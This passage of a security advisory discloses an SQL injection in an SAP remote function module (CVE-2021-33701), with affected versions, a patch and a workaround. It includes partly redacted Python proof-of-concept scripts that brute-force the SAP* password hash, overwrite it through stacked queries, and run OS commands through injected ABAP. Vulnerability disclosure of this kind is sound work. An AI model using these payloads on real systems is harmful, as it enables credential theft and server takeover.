/>Vulnerability overview/description:<br />-----------------------------------<br />1. 
Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)<br /><br />The IT_WHERE_CLAUSE parameter of the function module<br />IUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ADBC SQL Injection. The<br />function is part of the package CNV_INC_PROCESSING_REMOTE inside the function<br />module group IUUC_REMOTE. It is typically used to count table records in the<br />context of logging table and trigger creations.<br /><br />ADBC is an API for the Native SQL interface of the AS ABAP that is based on<br />ABAP Objects and can be used to pass Native SQL statements to the database<br />interface. ADBC SQL injections are a very serious type of vulnerability as<br />they allow attackers not only to access data directly at the database layer<br />but also to break out of the current client context. Moreover, stacked queries<br />can be used to perform arbitrary read/write commands. All of this leads to<br />full compromise of the SAP application server.<br /><br />As the affected function module is remote enabled, it allows attackers to<br />perform remote attacks via RFC.<br /><br />Note that the vulnerability was originally found by SEC Consult during<br />research on a system with DMIS in version DMIS 2011_1_731 SP 0013. In this<br />version, the same parameter IT_WHERE_CLAUSE was vulnerable to an ABAP<br />Command Injection.<br /><br />The vulnerability seems to have been fixed insufficiently, leaving behind this<br />ADBC SQL Injection. The advisory can be viewed at the following URL:<br /><br />https://sec-consult.com/vulnerability-lab/advisory/remote-abap-code-injection-in-sap-netweaver/<br /><br /><br />Attack Prerequisites<br />--------------------<br />1. 
Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)<br /><br />First prerequisite is the authorization object S_DMIS (SAP SLO Data migration<br />server) with at least the following settings:<br /><br />MBT_PR_ARE: SAP Landscape Transformation<br />MBT_PR_LEV: (not needed to be set)<br />ACTVT: 03 Display<br /><br />Note that it is common practice that authorization objects are (mis)configured<br />with wildcards, which increases the likelihood of exploitation of the vulnerability.<br /><br />Further, authorization to perform function calls (S_RFC) has to be<br />granted for remote exploitation or access to SE37 for local privilege escalation<br /><br />In the majority of cases internal RFC communications are nowadays still found<br />to be unencrypted. This increases the risk that attackers wiretap account<br />passwords. Once such user is hijacked, the attacker has gained all necessary<br />prerequisites for further attacks as described in this advisory.<br /><br /><br />Proof of concept:<br />-----------------<br />1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)<br /><br />Example A: Arbitrary Read<br /><br />As a proof of concept, a script was created to brute force the password hash<br />of the SAP* users in client 000 while authenticated to client 001. This<br />also demonstrates the possibility of breaking out of the current client context.<br />For this example, a boolean based Blind SQL attack was used. 
In<br />order to get the exploitation to work, an arbitrary existing table has to be<br />specified for the parameter I_TABNAME (in this PoC ZDEMO_SOH was chosen).<br /><br />The following excerpt shows the source code of the script:<br /><br />* ************************************************************************** *<br />#!/usr/bin/env python3<br />from pyrfc import Connection<br />from string import ascii_letters<br /><br />def generate_alphabet():<br /> alph = []<br /> for c in ascii_letters:<br /> alph.append(c)<br /> for i in range(0,10):<br /> alph.append(str(i))<br /> alph.append('+')<br /> alph.append('/')<br /> alph.append('=')<br /> return alph<br /><br />if __name__ == '__main__':<br /> final_str = ""<br /> conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "001",<br /> user= "Peter", passwd="Sap123456", lang='EN')<br /> alph = generate_alphabet()<br /><br /> print("Brute Forcing SAP* password hash in client 000 ...")<br /><br /> for i in range(16, 61):<br /> toggle = 0<br /> for c in alph:<br /> where_clause = ("('" + c +<br /> "' IN (SELECT SUBSTRING(PWDSALTEDHASH," + str(i) +<br /> ",1) from USR02 WHERE BNAME='SAP*' AND MANDT='000'))")<br /><br /> [ --- PoC partially removed --- ]<br /><br /> if(result['ET_COUNT'][0]['RECCNT'] != 0):<br /> final_str += c<br /> print("{x-issha, 1024}" + final_str,end='\r')<br /> print ("\n")<br />* ************************************************************************** *<br /><br />Running the code produces the following output:<br /><br />$> poc_iuuc_remote.py<br />Brute Forcing SAP* password hash in client 000...<br />{x-issha, 1024}DRM3SNvfwWWsDf71QYyx+5L0AkN3l0nyKgPjvlBsPqE=<br /><br /><br />Example B: Arbitrary Write<br /><br />The next proof of concept demonstrates arbitrary write to the database by using<br />stacked queries. 
The following payload inserts the password hash corresponding<br />to the plaintext password "Test123" into the SAP* user of all clients and<br />then authenticates as user SAP* in the other client, 000. Afterwards, the<br />OS command "ip addr" is executed:<br /><br />* ************************************************************************** *<br />#!/usr/bin/env python3<br />from pyrfc import Connection<br /><br />def read_ABAP_Report():<br />    with open('X:\\test.abap') as file:<br />        content = file.readlines()<br />    content = [x.strip() for x in content]<br />    return content<br /><br />if __name__ == '__main__':<br />    final_str = ""<br />    conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "001",<br />                      user= "Peter", passwd="Sap123456", lang='EN')<br /><br />    where_clause = (<br />        "1 = 1 ); UPDATE USR02 SET PWDSALTEDHASH = "<br />        "'{x-issha, 1024}voJRVT/rrJ31pxfmhb/zaBqhXA81CYKSnylMlKr/CkE=' "<br />        "WHERE BNAME = 'SAP*'; COMMIT WORK; --")<br /><br />    [ --- PoC partially removed --- ]<br /><br />    conn2 = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "000",<br />                       user= "SAP*", passwd="Test123", lang='EN')<br /><br />    inject = ['REPORT Z_TEST213.'<br />              'DATA(c) = \'ip addr\'.',<br />              'DATA t TYPE TABLE OF char255.',<br />              'DATA l(250) TYPE c.',<br />              'CALL \'SYSTEM\' ID \'COMMAND\' FIELD c ID \'TAB\' FIELD t.',<br />              'LOOP AT t INTO l.',<br />              'WRITE: / l.',<br />              'ENDLOOP.']<br /><br />    params = {'PROGRAM':inject}<br />    result = conn2.call('/SAPDS/RFC_ABAP_INSTALL_RUN', **params)<br />    for x in result['WRITES']:<br />        print(x['ZEILE'])<br />* ************************************************************************** *<br /><br />Running the code produces the following output:<br /><br />$> .\poc_iuuc_remote2.py<br />1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group<br /> default ql<br /> link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00<br /> inet 127.0.0.1/8 scope host lo<br /> valid_lft forever preferred_lft forever<br /> inet6 ::1/128 scope host<br /> valid_lft forever preferred_lft forever<br />2: enp0s3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state<br /> DOWN<br /> link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff<br />3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state U<br /> P grou<br /> link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff<br /> inet XX.XX.XX.XX/24 brd XX.XX.XX.255 scope global noprefixroute enp0s8<br /> valid_lft forever preferred_lft forever<br /> inet6 fe80::a00:27ff:fec3:fa40/64 scope link<br /> valid_lft forever preferred_lft forever<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />This vulnerability has been tested on SAP Netweaver 752 SP-LEVEL 0004,<br />DMIS Release 2011_1_731 SP-Level 0016, SP SAPK-11616INDMIS.<br /><br />According to the vendor, the following products / versions are affected:<br />* SAPSCORE 125 < SAPK-12502INSAPSCORE<br />* S4CORE 105 < SAPK-10503INS4CORE<br />* S4CORE 104 < SAPK-10405INS4CORE<br />* S4CORE 103 < SAPK-10307INS4CORE<br />* S4CORE 102 < SAPK-10209INS4CORE<br />* S4CORE 101 < SAPK-10111INS4CORE<br />* S4CORE 100<br />* DMIS 2018_1_752 < SAPK-20106INDMIS<br />* DMIS 2020 < SAPK-20202INDMIS<br />* DMIS 2011_1_700 < SAPK-11321INDMIS<br />* DMIS 2011_1_710 < SAPK-11421INDMIS<br />* DMIS 2011_1_730 < SAPK-11521INDMIS<br />* DMIS 2011_1_731 < SAPK-11621INDMIS<br />* DMIS 2011_1_620 < SAPK-11121INDMIS<br />* DMIS 2011_1_640 < SAPK-11221INDMIS<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-08: Contacting SAP Product Security Response Team through Web Portal<br /> https://www.sap.com/about/trust-center/security/incident-management.html<br /> ID SR-21-00009 has been assigned<br />2021-07-19: Vendor confirms vulnerability<br />2021-08-10: SNote 3078312 with patch released<br />2021-11-17: SEC Consult sends final advisory to vendor and informs about release<br /> date<br />2021-11-18: SAP requests to obfuscate or remove PoC<br />2021-12-14: Coordinated release of security advisory<br /><br /><br />Solution:<br />---------<br />SEC Consult advises all SAP® customers to implement SAP Security Note<br />3078312 immediately. Note that Security Note 3078312 contains no automatic<br />correction instructions for customers who run systems with DMIS versions or<br />Support Package levels lower than DMIS 2011 SP10 (2015). Please refer to the<br />Workaround section.<br /><br /><br />Workaround:<br />-----------<br />In lower SP levels, the correction can be applied manually by modifying<br />function module IUUC_RECON_RC_COUNT_TABLE_BIG and adding the following statement<br />directly after the authorization check:<br /><br />ASSERT it_where_clause[] IS INITIAL.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendations about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested in working with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Raschin Tavakoli / @2021<br /><br /><br /></code></pre>